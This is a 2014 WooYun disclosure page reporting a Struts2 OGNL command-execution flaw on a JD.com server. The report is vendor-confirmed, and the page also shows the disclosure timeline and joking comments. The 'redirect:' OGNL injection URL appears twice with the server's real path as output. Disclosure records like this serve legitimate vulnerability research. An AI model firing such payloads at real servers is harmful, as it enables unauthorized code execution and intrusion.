京东商城某站命令执行（威胁内网） | wooyun-2014-055825| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-055825

漏洞标题：京东商城某站命令执行（威胁内网）

漏洞作者： if、so

提交时间：2014-04-07 13:37

修复时间：2014-05-22 13:38

公开时间：2014-05-22 13:38

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-04-07：细节已通知厂商并且等待厂商处理中
2014-04-08：厂商已经确认，细节仅向厂商公开
2014-04-18：细节向核心白帽子及相关领域专家公开
2014-04-28：细节向普通白帽子公开
2014-05-08：细节向实习白帽子公开
2014-05-22：细节向公众公开

简要描述：

京东商城某站命令执行

详细说明：

问题出在211.152.123.83，http://211.152.123.83/login.jhtml.

http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}

/export/data/tomcatRoot/jq1.360buy.com/

漏洞证明：

http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}

/export/data/tomcatRoot/jq1.360buy.com/

修复方案：

patch

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-04-08 17:18

厂商回复：

谢谢您对京东安全的关注

漏洞评价：

2014-04-07 17:19 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

这是真的么？求扣扣交流
2014-04-07 21:54 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷，这坑爹的七夕啊。。。。)

···楼主这么屌东哥家的小天天知道么
2014-04-08 02:01 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

洞主这么叼，耐插MM造吗？？
2014-04-08 09:39 | 酱油甲 ( 普通白帽子 | Rank:645 漏洞数:126 | 打个酱油，吃个海蜇~)

洞主这么叼，奶茶MM宣你嘛？
2014-05-22 21:10 | ddy ( 实习白帽子 | Rank:44 漏洞数:16 | 其实第一次要我挖洞我是拒绝的。因为，你不...)

洞主这么叼，奶茶MM造吗？？
2014-05-23 12:52 | Annabelle ( 实习白帽子 | Rank:46 漏洞数:15 | .)

耐插MM.....
2014-06-04 10:20 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

楼上的大神们太幽默了。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-055825

漏洞标题：京东商城某站命令执行（威胁内网）

相关厂商：京东商城

漏洞作者： if、so

提交时间：2014-04-07 13:37

修复时间：2014-05-22 13:38

公开时间：2014-05-22 13:38

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-055825

漏洞标题：京东商城某站命令执行（威胁内网）

相关厂商：京东商城

漏洞作者： if、so

提交时间：2014-04-07 13:37

修复时间：2014-05-22 13:38

公开时间：2014-05-22 13:38

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-055825"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：